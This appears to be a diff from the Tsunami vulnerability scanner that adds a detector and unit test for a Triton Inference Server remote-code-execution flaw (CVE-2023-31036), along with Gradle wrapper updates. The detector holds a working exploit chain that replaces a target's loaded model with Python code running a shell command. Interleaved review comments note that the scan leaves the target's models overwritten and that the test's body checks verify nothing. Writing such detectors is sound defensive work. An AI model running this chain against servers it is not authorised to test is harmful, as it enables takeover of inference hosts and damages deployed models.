"instance_group [\n" + + " {\n" + + " count: 1\n" + + " kind: KIND_CPU\n" + + " }\n" + + "]\n" + + "\n" + + "parameters [\n" + + " {\n" + + " key: \"INFERENCE_MODE\"\n" + + " value: { string_value: \"true\" }\n" + + " }\n" + + "]\n"; + + @VisibleForTesting + static final String PYTHON_MODEL = + "import subprocess\n" + + "class TritonPythonModel:\n" + + " def initialize(self, args):\n" + + " subprocess.run(\"%s\",shell=True)\n" + + " def execute(self, requests):\n" + + " return\n" + + " def finalize(self):\n" + + " return"; + + private final HttpClient httpClient; + private final Clock utcClock; + + @Inject + TritonInferenceServerRceVulnDetector( + HttpClient httpClient, @UtcClock Clock utcClock, PayloadGenerator payloadGenerator) { + this.httpClient = checkNotNull(httpClient); + this.utcClock = checkNotNull(utcClock); + this.payloadGenerator = checkNotNull(payloadGenerator); + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + logger.atInfo().log("TritonInferenceServerRceVulnDetector starts detecting."); + + return DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + } + + @VisibleForTesting + String buildRootUri(NetworkService networkService) { + return buildWebApplicationRootUrl(networkService); + } + + private boolean isServiceVulnerable(NetworkService networkService) { + var payload = getTsunamiCallbackHttpPayload(); + if (payload == null || !payload.getPayloadAttributes().getUsesCallbackServer()) { + logger.atWarning().log( + "The Tsunami callback server is not setup for this environment, so we cannot confirm the" + + " RCE callback"); + return false; + } + + String cmd = payload.getPayload(); + + final String rootUri = buildRootUri(networkService); + + try { + HttpResponse modelNames = + httpClient.send( + 
post(rootUri + "v2/repository/index").withEmptyHeaders().build(), networkService); + + if (modelNames.bodyString().isEmpty()) { + return false; + } + JsonArray modelNamesJo = + JsonParser.parseString(modelNames.bodyString().get()).getAsJsonArray(); + if (modelNamesJo.isJsonNull()) { + return false; + } + String anExistingModelName = null; + for (JsonElement modelNameJe : modelNamesJo) { + if (modelNameJe.isJsonObject()) { + JsonObject jsonObject = modelNameJe.getAsJsonObject(); + if (jsonObject.has("name")) { + anExistingModelName = jsonObject.get("name").getAsString(); + break; + } + } + } + if (anExistingModelName == null) { + return false; + } + // Attempting to unload model + httpClient.send( + post(String.format(rootUri + "v2/repository/models/%s/unload", anExistingModelName)) + .withEmptyHeaders() + .build(), + networkService); + + // Creating model repo layout: uploading model config + httpClient.send( + post(String.format(rootUri + "v2/repository/models/%s/load", anExistingModelName)) + .setHeaders(HttpHeaders.builder().addHeader(CONTENT_TYPE, "application/json").build()) + .setRequestBody( + ByteString.copyFromUtf8( + String.format( + UPLOAD_CONFIG_PAYLOAD, + Base64.getEncoder() + .encodeToString( + String.format(MODEL_CONFIG, anExistingModelName).getBytes())))) + .build(), + networkService); + + // Creating model repo layout: uploading the model + httpClient.send( + post(String.format(rootUri + "v2/repository/models/%s/load", anExistingModelName)) + .setHeaders(HttpHeaders.builder().addHeader(CONTENT_TYPE, "application/json").build()) + .setRequestBody( + ByteString.copyFromUtf8( + String.format( + UPLOAD_MODEL_PAYLOAD, + Base64.getEncoder() + .encodeToString(String.format(PYTHON_MODEL, cmd).getBytes())))) + .build(), + networkService); + + // Loading model to trigger payload + httpClient.send( + post(String.format(rootUri + "v2/repository/models/%s/load", anExistingModelName)) + .withEmptyHeaders() + .build(), + networkService); + } catch 
(RuntimeException | IOException e) { + logger.atWarning().withCause(e).log( + "Fail to exploit '%s'. Maybe it is not vulnerable", rootUri); + return false; + } + + // If there is an RCE, the execution isn't immediate + logger.atInfo().log("Waiting for RCE callback."); + try { + Thread.sleep(10000); + } catch (InterruptedException e) { + logger.atWarning().withCause(e).log("Failed to wait for RCE result"); + return false; + } + if (payload.checkIfExecuted()) { + logger.atInfo().log("RCE payload executed!"); + return true; + } + return false; + } + + private Payload getTsunamiCallbackHttpPayload() { + try { + return this.payloadGenerator.generate( + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.BLIND_RCE) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL) + .setExecutionEnvironment( + PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT) + .build()); + } catch (NotImplementedException n) { + return null; + } + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService vulnerableNetworkService) { + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("TritonInferenceServerRce")) + .setSeverity(Severity.CRITICAL) + .setTitle("Triton Inference Server RCE") + .setDescription( + "This detector checks triton inference server RCE with explicit model-control" + + " option enabled. 
\n" + + "All versions of triton inference server with the `--model-control" + + " explicit` option allows for loaded models to be overwritten by " + + " malicious models and lead to RCE.") + .setRecommendation("don't use `--model-control explicit` option with public access") + .addRelatedId( + VulnerabilityId.newBuilder().setPublisher("CVE").setValue("CVE-2023-31036"))) + .build(); + } +} diff --git a/community/detectors/triton_inference_server_model_overwrite/src/test/java/com/google/tsunami/plugins/detectors/rce/TritonInferenceServerRceVulnDetectorTest.java b/community/detectors/triton_inference_server_model_overwrite/src/test/java/com/google/tsunami/plugins/detectors/rce/TritonInferenceServerRceVulnDetectorTest.java new file mode 100644 index 000000000..8652f5b4d --- /dev/null +++ b/community/detectors/triton_inference_server_model_overwrite/src/test/java/com/google/tsunami/plugins/detectors/rce/TritonInferenceServerRceVulnDetectorTest.java 
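Review bot: `isServiceVulnerable` unloads the first model the target lists and loads replacement files under that same name, and nothing visible in the hunk restores the original or checks a response status, so a scan may leave a live model replaced even when an intermediate step failed. The index response is parsed without a status check and every later `httpClient.send(...)` result is discarded. Gate the sequence with `if (!modelNames.status().isSuccess()) { return false; }` and return as soon as the unload or a load answers with a non-success status. The class Javadoc and the `@PluginInfo` description should say that the check is intrusive and modifies the target's loaded model, so operators can decide whether to run it against production. Smaller points: `.getBytes()` uses the platform charset while the test encodes with `UTF_8`, so `getBytes(StandardCharsets.UTF_8)` is safer, and the `InterruptedException` handler should call `Thread.currentThread().interrupt();` before `return false;`.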
@@ -0,0 +1,221 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.rce; + +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; +import static com.google.tsunami.plugins.detectors.rce.TritonInferenceServerRceVulnDetector.MODEL_CONFIG; +import static com.google.tsunami.plugins.detectors.rce.TritonInferenceServerRceVulnDetector.PYTHON_MODEL; +import static com.google.tsunami.plugins.detectors.rce.TritonInferenceServerRceVulnDetector.UPLOAD_CONFIG_PAYLOAD; +import static com.google.tsunami.plugins.detectors.rce.TritonInferenceServerRceVulnDetector.UPLOAD_MODEL_PAYLOAD; +import static java.nio.charset.StandardCharsets.UTF_8; + +import com.google.common.collect.ImmutableList; +import com.google.common.truth.Truth; +import com.google.inject.Guice; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.plugin.payload.testing.PayloadTestHelper; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import 
com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.nio.charset.StandardCharsets; +import java.security.SecureRandom; +import java.time.Instant; +import java.util.Arrays; +import java.util.Base64; +import java.util.Objects; +import javax.inject.Inject; +import okhttp3.mockwebserver.Dispatcher; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import okhttp3.mockwebserver.RecordedRequest; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** Unit tests for {@link TritonInferenceServerRceVulnDetector}. */ +@RunWith(JUnit4.class) +public final class TritonInferenceServerRceVulnDetectorTest { + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2024-12-03T00:00:00.00Z")); + + private final MockWebServer mockTargetService = new MockWebServer(); + private final MockWebServer mockCallbackServer = new MockWebServer(); + + @Inject private TritonInferenceServerRceVulnDetector detector; + + TargetInfo targetInfo; + NetworkService targetNetworkService; + private final SecureRandom testSecureRandom = + new SecureRandom() { + @Override + public void nextBytes(byte[] bytes) { + Arrays.fill(bytes, (byte) 0xFF); + } + }; + + @Before + public void setUp() throws IOException { + mockCallbackServer.start(); + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder() + .setCallbackServer(mockCallbackServer) + .setSecureRng(testSecureRandom) + .build(), + new TritonInferenceServerRceDetectorBootstrapModule()) + .injectMembers(this); + } + + @After + public void tearDown() 
throws Exception { + mockTargetService.shutdown(); + mockCallbackServer.shutdown(); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability() throws IOException { + startMockWebServer(true); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(targetNetworkService) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("TritonInferenceServerRce")) + .setSeverity(Severity.CRITICAL) + .setTitle("Triton Inference Server RCE") + .setDescription( + "This detector checks triton inference server RCE with explicit" + + " model-control option enabled. 
\n" + + "All versions of triton inference server with the" + + " `--model-control explicit` option allows for loaded models to" + + " be overwritten by malicious models and lead to RCE.") + .setRecommendation( + "don't use `--model-control explicit` option with public access") + .addRelatedId( + VulnerabilityId.newBuilder() + .setPublisher("CVE") + .setValue("CVE-2023-31036"))) + .build()); + Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(5); + Truth.assertThat(mockCallbackServer.getRequestCount()).isEqualTo(1); + } + + @Test + public void detect_ifNotVulnerable_doesNotReportVuln() throws IOException { + startMockWebServer(false); + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(1); + } + + private void startMockWebServer(boolean withAnExistingModel) throws IOException { + final Dispatcher dispatcher = + new Dispatcher() { + @Override + public MockResponse dispatch(RecordedRequest request) { + // get an existing model name + if (withAnExistingModel + && Objects.equals(request.getPath(), "/v2/repository/index") + && request.getMethod().equals("POST")) { + return new MockResponse().setBody("[{\"name\":\"metasploit\"}]").setResponseCode(200); + } + // Attempting to unload model + if (Objects.equals(request.getPath(), "/v2/repository/models/metasploit/unload")) { + if (request.getMethod().equals("POST")) { + return new MockResponse().setResponseCode(200); + } + } + // Creating model repo layout: uploading the model + // Or Creating model repo layout: uploading model config + if (Objects.equals(request.getPath(), "/v2/repository/models/metasploit/load")) { + if (request.getMethod().equals("POST") + && !request.getBody().readString(StandardCharsets.UTF_8).isEmpty() + && Objects.requireNonNull(request.getHeaders().get("Content-Type")) + 
.equals("application/json") + && (Objects.equals( + request.getBody().readString(StandardCharsets.UTF_8), + String.format( + UPLOAD_CONFIG_PAYLOAD, + Base64.getEncoder() + .encodeToString( + String.format(MODEL_CONFIG, "metasploit").getBytes(UTF_8)))) + || request + .getBody() + .readString(StandardCharsets.UTF_8) + .startsWith( + String.format( + UPLOAD_MODEL_PAYLOAD, + Base64.getEncoder() + .encodeToString( + PYTHON_MODEL.substring(0, 20).getBytes(UTF_8)))))) { + return new MockResponse().setResponseCode(200); + } + } + // Loading model to trigger payload + if (Objects.equals(request.getPath(), "/v2/repository/models/metasploit/load")) { + if (request.getMethod().equals("POST") + && request.getBody().readString(StandardCharsets.UTF_8).isEmpty()) { + return new MockResponse().setResponseCode(200); + } + } + return new MockResponse().setBody("[{}]").setResponseCode(200); + } + }; + mockTargetService.setDispatcher(dispatcher); + mockTargetService.start(); + mockTargetService.url("/"); + + targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .build(); + targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + } +} diff --git a/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradle/wrapper/gradle-wrapper.jar b/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradle/wrapper/gradle-wrapper.jar differ 
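Review bot: The body checks in the `startMockWebServer` dispatcher do not verify anything, because `request.getBody().readString(...)` consumes the Okio buffer. The first call inside `!...isEmpty()` drains it, so the later `Objects.equals(...)` and `startsWith(...)` comparisons see an empty string, and every `/load` request is answered by the "Loading model to trigger payload" branch or the catch-all 200. Read the body once, `String body = request.getBody().readUtf8();`, and compare against that variable. Even then the `startsWith` arm looks unreachable, since it formats the whole `UPLOAD_MODEL_PAYLOAD` template, closing `" }}` included, around a padded Base64 of a 20-character prefix; decoding the `file:1/model.py` value and comparing its start would be more robust. As written the test shows only that five requests were sent (`getRequestCount()`), not that the config and model uploads carried the expected content.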
diff --git a/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradle/wrapper/gradle-wrapper.properties b/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradlew b/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradlew +++ b/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradlew.bat b/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradlew.bat +++ b/community/detectors/wso2_arbitrary_file_upload_cve_2022_29464/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
